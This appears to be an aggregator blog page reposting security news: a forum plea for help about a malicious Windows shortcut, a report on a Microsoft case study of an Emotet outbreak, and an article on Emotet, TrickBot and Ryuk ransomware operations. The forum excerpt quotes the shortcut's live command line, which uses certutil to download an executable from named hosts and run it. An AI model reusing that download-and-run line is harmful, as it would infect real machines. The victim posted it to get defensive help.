Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Microsoft: Emotet Took Down a Network by Overheating All Computers - BleepingComputer

Microsoft: Emotet Took Down a Network by Overheating All Computers - BleepingComputer


Microsoft: Emotet Took Down a Network by Overheating All Computers - BleepingComputer

Posted: 03 Apr 2020 12:00 AM PDT

Microsoft: Emotet Took Down a Network by Overheating All Computers

Microsoft says that an Emotet infection was able to take down an organization's entire network by maxing out CPUs on Windows devices and bringing its Internet connection down to a crawl after one employee was tricked to open a phishing email attachment.

"After a phishing email delivered Emotet, a polymorphic virus that propagates via network shares and legacy protocols, the virus shut down the organization's core services," DART said.

"The virus avoided detection by antivirus solutions through regular updates from an attacker-controlled command-and-control (C2) infrastructure, and spread through the company's systems, causing network outages and shutting down essential services for nearly a week."

All systems down within a week

The Emotet payload was delivered and executed on the systems of Fabrikam — a fake name Microsoft gave the victim in their case study — five days after the employee's user credentials were exfiltrated to the attacker's command and control (C&C) server.

Before this, the threat actors used the stolen credentials to deliver phishing emails to other Fabrikam employees, as well as to their external contacts, with more and more systems getting infected and downloading additional malware payloads.

The malware further spread through the network without raising any red flags by stealing admin account credentials authenticating itself on new systems, later used as stepping stones to compromise other devices.

Within 8 days since that first booby-trapped attachment was opened, Fabrikam's entire network was brought to its knees despite the IT department's efforts, with PCs overheating, freezing, and rebooting because of blue screens, and Internet connections slowing down to a crawl because of Emotet devouring all the bandwidth.

Emotet attack flow
Emotet attack flow (Microsoft DART)

"When the last of their machines overheated, Fabrikam knew the problem had officially spun out of control. 'We want to stop this hemorrhaging,' an official would later say," DART's case study report reads.

"He'd been told the organization had an extensive system to prevent cyberattacks, but this new virus evaded all their firewalls and antivirus software. Now, as they watched their computers blue-screen one by one, they didn't have any idea what to do next."

Based on what the official said following the incident, although not officially confirmed, the attack described by Microsoft's Detection and Response Team (DART) matches a malware attack that impacted the city of Allentown, Pennsylvania in February 2018, as ZDNet first noticed.

At the time, Mayor Ed Pawlowski said that the city had to pay nearly $1 million to Microsoft to clean out their systems, with an initial $185,000 emergency-response fee to contain the malware and up to $900,000 in additional recovery costs, as first reported by The Morning Call.

Emotet infection aftermath and containment procedures

"Officials announced that the virus threatened all of Fabrikam's systems, even its 185-surveillance camera network," DART's report says.

"Its finance department couldn't complete any external banking transactions, and partner organizations couldn't access any databases controlled by Fabrikam. It was chaos.

"They couldn't tell whether an external cyberattack from a hacker caused the shutdown or if they were dealing with an internal virus. It would have helped if they could have even accessed their network accounts.

"Emotet consumed the network's bandwidth until using it for anything became practically impossible. Even emails couldn't wriggle through."

Microsoft's DART — a remote team and one that would deal with the attack on site — was called in eight days after the first device on Fabrikam's network was compromised.

DART contained the Emotet infection using asset controls and buffer zones designed to isolate assets with admin privileges.

They eventually were able to completely eradicate the Emotet infection after uploading new antivirus signatures and deploying Microsoft Defender ATP and Azure ATP trials to detect and remove the malware.

Microsoft recommends using email filtering tools to automatically detect and stop phishing emails that spread the Emotet infection, as well as the adoption of multi-factor authentication (MFA) to stop the attackers from taking advantage of stolen credentials.

Emotet infection chain
Emotet infection chain (CISA)

Emotet infections can lead to severe outcomes

Emotet, originally spotted as a banking Trojan in 2014, has evolved into a malware loader used by threat actors to install other malware families including but not limited to the Trickbot banking Trojan (a known vector used in the delivery of Ryuk ransomware payloads).

Emotet was recently upgraded with a Wi-Fi worm module designed to help it spread to new victims via nearby insecure wireless networks.

Recently, in January 2020, the Cybersecurity and Infrastructure Security Agency (CISA) warned government and private organizations, as well as home users, of increasing activity around targeted Emotet attacks.

In November 2019, the Australian Signals Directorate's Australian Cyber Security Centre (ACSC) also warned of the dangers behind Emotet attacks, saying at the time that the malware "provides an attacker with a foothold in a network from which additional attacks can be performed, often leading to further compromise through the deployment of ransomware."

Emotet ranked first in a 'Top 10 most prevalent threats' ranking published by interactive malware analysis platform Any.Run at the end of December 2019, with triple the number of sample uploads submitted for analysis when compared to the next malware in the top, the Agent Tesla info-stealer.

CISA provides general best practices to limit the effect of Emotet attacks and to contain network infections within an Emotet Malware alert published two years ago and updated earlier this year.

Emotet, Ryuk, TrickBot: 'Loader-Ransomware-Banker Trifecta' - BankInfoSecurity.com

Posted: 15 Apr 2020 12:00 AM PDT

Cybercrime , Cybercrime as-a-service , Fraud Management & Cybercrime

More Advanced Cybercrime Services Help Hackers Boost Illicit Earnings
Emotet, Ryuk, TrickBot: 'Loader-Ransomware-Banker Trifecta'
Ryuk ransom note extract (Source: McAfee)

Rather than building their own attack tools, many criminals are continuing to use cybercrime platforms and services to make it easier to earn an illicit paycheck. Some gangs are also combining tools in an attempt to earn even more.

See Also: Anatomy of a Botnet Log: What Cybercriminals See When Users Fall for Coronavirus Malware Lures

For example, a large number of attacks today combine Emotet, Ryuk and TrickBot. "This loader-ransomware-banker trifecta has wreaked havoc in the business world over the past two years, causing millions of dollars in damages and ransoms paid," says cybercrime intelligence firm Intel 471 in a new report.

TrickBot is one of many malware-as-a-service offerings that allow attackers to focus on infecting systems, while in effect outsourcing the development and maintenance of the malware they use, typically in return for a subscription fee. As with all parts of the cybercrime service economy, MaaS offerings are becoming less expensive to procure while offering increasingly powerful capabilities (see: From Cybercrime Zero to 'Hero' - Now Faster Than Ever).

"MaaS operations cannot be written off as merely 'commodity' malware, since their client pool includes very skilled groups that can and will cause serious damage if allowed to do so," Intel 471 says.

Such operations can also be extremely lucrative for everyone involved. One subset of MaaS are ransomware-as-a-service offerings, of which Sodinokibi - aka REvil - is the most popular. "Affiliates" of the program get a version of the ransomware tied to their unique affiliate ID, and keep 60 percent to 70 percent of every ransom paid, while the RaaS operators pocket the rest (see: Sodinokibi Ransomware Gang Appears to Be Making a Killing).

Cybercrime Trifecta

On their own, any of these pieces of malware can wreak plenty of havoc. By combining forces, however, they can do even more damage.

And one of the more problematic tie-ups remains the crossover between attackers who wield the sophisticated strain of malware called Emotet, which started life as a banking Trojan, together with TrickBot and Ryuk ransomware. While TrickBot also started life as a banking Trojan, like Emotet it's been updated to also work as a downloader, meaning that once it infects a system, botnet controllers can push additional modules or functionality onto an infected - or zombie - endpoint. In some cases, TrickBot or Emotet is also being used to install Ryuk ransomware on endpoints.

Ryuk, which is based on Hermes ransomware, was first spotted in August 2018. Since then, its developers have continued to refine the code.

Last year, Emotet and TrickBot were two of the most-seen strains of malware, and their popularity hasn't waned. In January, the U.S. Cybersecurity and Infrastructure Security Agency warned that it had been seeing a fresh surge in Emotet attacks (see: Emotet Malware Alert Sounded by US Cybersecurity Agency).

Not every Emotet, TrickBot or Ryuk infection necessarily involves more than one of those pieces of malware being installed. But incident responders should assume that when they find one, more might have also been pushed into an IT environment.

"In the new age of 'ransomhack' incidents, it is imperative to treat and investigate ransomware matters as possible data breaches to mitigate and understand the scope of the intrusion," New York-based threat intelligence firm Advanced Intelligence, also known as AdvIntel, says in a recent report.

Target: Active Directory

Emotet, TrickBot and Ryuk sometimes get seen as standalone in attacks, experts say, but they also often appear together. "Many of the Ryuk incidents we've been privy to have involved both Emotet and TrickBot," Intel 471 says. Even so, such attacks typically unfold in very specific ways, beginning with Emotet being used as a downloader for TrickBot, which installs tools such as the Cobalt Strike penetration testing framework in an attempt to gain full access to admin panels and an organization's Domain Admin credentials to gain unrestricted access to Active Directory, at which point it's typically "game over" for defenders (see: Why Hackers Abuse Active Directory).

Such attacks do, however, appear to require some hacking skills. "The deployment of Cobalt Strike does not appear to be automated, but instead is initiated on specific bots that match a profile," Intel 471 says. With control of AD, attackers can gain easy remote access to all systems across the network and set group policy objects to disable anti-virus and other security defenses on endpoints. "Find the domain controller and you have the keys to a network," Intel 471 says.

The approach practiced by these groups "is a mix of automation," via automated malware such as Emotet and Trickbot, "but they also use some human network exploitation factor," said Vitali Kremez, in a presentation delivered at the CONFidence 2019 conference held last June in Krakow, Poland. The modus operandi is simple: Backed by automated malware, find and exploit Active Directory to gain "full god mode," referring to the video game expression that allows a user to do whatever they want, inside an environment.

To have a range of targets to choose from, TrickBot last year was notching up 500 to 5,000 new infections per day, some effected via Emotet as a loader, and others via third parties, often spread via emails with malicious, macro-enabled Office files attached, said Kremez, who leads SentinelLabs at security firm SentinelOne.

"Inside Cybercrime Groups Harvesting Active Directory for Fun," a presentation delivered by Vitali Kremez at the June 2019 CONFidence conference in Krakow, Poland.

This approach is "very clever, and it enables them to be very successful," Kremez said. "This is the current, most successful model exploiting and targeting huge corporations, banking environments, counties and governments in the U.S. and all over the world."

Final Stage: Ryuk

Such attacks may unfold over a period of days, weeks or even months (see: Ransomware Attackers May Lurk for Months, FBI Warns).

The final stage in these attacks can include installing Ryuk as a money-making coup de grĂ¢ce. But attackers typically install ransomware - Ryuk or otherwise - only at the very end of a much longer attack chain, in part because unleashing crypto-locking malware is very noisy and will reveal that hackers have been camping out in an organization's network, if administrators had not yet detected their presence. Before ransomware shows up, however, attackers may have already ransacked network-connected systems for card data, financial information, customer databases and any other sensitive of confidential information that they might be able to sell via cybercrime forums to other criminals or even intelligence agencies.

For any organization that discovers Ryuk and thinks they may not have first been infected with TrickBot or Emotet, Kremez said it's much more likely that attackers instead just scrubbed their tracks. "It's never just Ryuk," he said.

Distribution: Spam, Emotet, Other Malware

While it's not clear who's behind any of the different pieces of malware, "TrickBot likely is operated by a single group as a malware-as-a-service platform that caters to a relatively small number of top-tier criminals," Intel 471 says.

Based on studying 37,000 TrickBot samples over an 18-month period, Intel 471 says it's identified 59 unique IDs, which get used together with a numeric code that appears to designate a unique campaign. It says 92 percent of all TrickBot samples trace to just five IDs - jim, lib, ono, sat and tot - each of which have their own practices and procedures.

"For example, It's suspected that jimXX, libXX and totXX are primarily delivered by malspam [spam]. We know that every morXX-related sample we observed was delivered via Emotet," the firm says. "All samples attributed to sinXX, tinXX and winXX were delivered via Bokbot, aka IcedID. Samples attributed to wmdXX seem to utilize several different loaders, such as Amadey, FastLoader and an unnamed loader. Lastly, satXX, summ1 and trg1 all utilized the Ostap JavaScript loader for delivery."

Ransomware Gangs Leak Stolen Data

But not all attackers bring multiple pieces of malware to bear in their attempt to maximize profits. In recent months, one widely practiced ransomware innovation has been to not just steal information before unleashing crypto-locking malware, but also threaten to release stolen data if a victim doesn't pay the ransom demand. Gangs are hoping these tactics will lead to more paydays, although experts say it's not clear yet if this tactic has been working.

The Maze ransomware gang last year first blazed the data-leaking trail last November, quickly followed by other groups, including DoppelPaymer, MegaCortex, Nemty, Snatch and Sodinokibi (see: More Ransomware Gangs Join Data-Leaking Cult).

Manifesto recently released by Maze (Source: AdvIntel)

"REvil, MegaCortex, Truniger (TeamSnatch), Nemty, Clop, BitPyLock - these ransomware groups are different in their origin, scale and methods; however, one thing unites them all - before encrypting the victim's data, they steal it and then threaten the victim to publish sensitive files," according to Advanced Intelligence.

Security experts tell Information Security Media Group that so far, Ryuk doesn't appear to have been tied to any leaks. But that might because Ryuk's operators are making such a killing that they don't need to bother. In the second half of 2019, the ransom payments being sent to Ryuk by victims more than doubled, according to ransomware incident response firm Coveware.

"Exfiltration is a somewhat risky strategy," Brett Callow, a threat analyst at security firm Emsisoft, tells ISMG. "Unless data is being pulled directly from cloud backups, it's possible the company will notice the unusual activity and lock down its network. Some groups obviously think that risk to be worthwhile, however, Ryuk is raking in so much money that they may see no reason to assume that risk."

Source: Coveware

In the meantime, other ransomware gangs continue to run with the "pay us or we'll leak your data" model, often via dedicated leak sites for naming and shaming victims as well as posting stolen data. Earlier this year, for example, the DoppelPaymer gang hit Visser Precision, which makes automobile, aerospace and manufacturing industry components for Boeing, SpaceX, Tesla, Lockheed Martin and others, and subsequently began leaking data tied to those organizations to try and force a ransom payment.

Lockheed Martin last month issued a statement saying it is aware of the attack on Visser and is "following our standard response process for potential cyber incidents related to our supply chain" (see: DoppelPaymer Ransomware Slams Supplier to Boeing and Tesla).

RagnarLocker Shakes Down EDP

More recently, the Ragnarok gang, wielding RagnarLocker, has been attempting to extort 1,580 bitcoins - worth about €10 million ($11 million) - from Energias de Portugal, a major Portuguese electric utilities company based in Lisbon.

"We had downloaded more than 10 TB of private information from EDP group servers," reads a post to the Ragnarok group's data-leaking site, Bleeping Computer reports.

RagnarLocker ransom note (Source: Vitali Kremez)

SentinelLabs' Kremez says the ransomware includes a number of features designed to make it difficult for victims to restore their systems.

As in so many ransomware infection cases, "the actors were in the victim's network for some time before running the [ransomware]," the anti-malware group MalwareHunterTeam reports. "Obviously we can't tell from when they were in EDP's network," but based on files leaked so far, the gang appears to have already begun stealing information by April 6.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US